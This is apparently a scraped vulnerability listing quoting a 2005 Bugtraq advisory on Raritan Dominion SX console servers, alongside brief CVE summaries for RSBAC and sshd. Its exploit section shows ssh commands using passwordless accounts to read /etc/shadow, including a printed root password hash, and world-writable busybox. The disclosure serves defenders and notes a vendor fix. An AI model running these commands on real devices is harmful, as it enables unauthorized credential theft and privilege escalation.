Rule Set Based Access Control (RSBAC) before 1.3.5 does not properly use the Linux Kernel Crypto API for the Linux kernel 2.6.x, which allows context-dependent attackers to bypass authentication controls via unspecified vectors, possibly involving User Management password hashing and unchecked function return codes.

CVE-2007-3945

Raritan Dominion SX (DSX) Console Servers DSX16, DSX32, DSX4, DSX8, and DSXA-48 set (1) world-readable permissions for /etc/shadow and (2) world-writable permissions for /bin/busybox, which allows local users to obtain hashed passwords or execute arbitrary code as other users.

**Bugtraq mailing list archives**

_From_: spam () drwetter org  
_Date_: 28 Jun 2005 17:56:55 -0000  

Hi,

during my research on console servers I've encountered a severe problem on one appliance.

Summary:
Access right escalation / severe permission problems on Raritan Console Servers

Confirmed on DSX32, Software version: 2.4.6
www.raritan.com, more see below

Details:
DSX Raritan Console Servers come with two accounts not having a password. They are "protected" by "exit" in ~/.profile. 
Users normally is not supposed to get access to the underlying Linux.
DES encrypted root passwd is easily retrievable from the network without providing credentials. Also the machine can be 
rendered useless by moving the busybox binary.

Vulnerable Versions:
Vendor Confirmation for DSX16, DSX32, DSX4, DSX8, DSXA-48 (Mips and Intel).


Patches/Workarounds:
After reporting it to Raritan a fix was released:
http://www.raritan.com/support/sup\_upgrades.aspx

Exploit:
%ssh dominion@<ip> ls -l /
\[..shows listing..\]
%ssh dominion@<ip> ls -ln /etc/shadow
-rw-r--r--    1 0     0           360 Jun 28 05:09 /etc/shadow
%ssh dominion@<ip> cat /etc/shadow
root:DX8k7w4C2gJ2g:10933:0:99999:7:::
bin:\*:10933:0:99999:7:::
daemon:\*:10933:0:99999:7:::
adm:\*:10933:0:99999:7:::
lp:\*:10933:0:99999:7:::
sync:\*:10933:0:99999:7:::
shutdown:\*:10933:0:99999:7:::
halt:\*:10933:0:99999:7:::
uucp:\*:10933:0:99999:7:::
operator:\*:10933:0:99999:7:::
nobody:\*:10933:0:99999:7:::
dominion::12962:0:99999:7:::
sshd::12962:0:99999:7:::
%ssh dominion@<ip> cat /etc/passwd | tail -2
dominion:x:500:500:Embedix User,,,:/home/dominion:/bin/sh
sshd:x:501:501:Embedix User,,,:/home/sshd:/bin/sh
%ssh sshd@<ip> ls
indexApp.htm
%ssh sshd@<ip> ls -l /bin/busybox
-rwxrwxrwx    1 root     root        193852 Apr  4  2004 /bin/busybox


-----
Dr. Dirk Wetter                                  http://drwetter.org
Consulting IT-Security + Open Source 
Key fingerprint = 80A2 742B 8195 969C 5FA6  6584 8B6E 59C1 E41B 9153

**Current thread:**

*   **Access right escalation / severe permission problems on Raritan Console Servers** _spam (Jun 28)_

CVE-2005-2136: Bugtraq: Access right escalation / severe permission problems on Raritan Console Servers

The SSH protocol server sshd allows local users without shell access to redirect a TCP connection through a service that uses the standard system password database for authentication, such as POP or FTP.

Tag

#ssh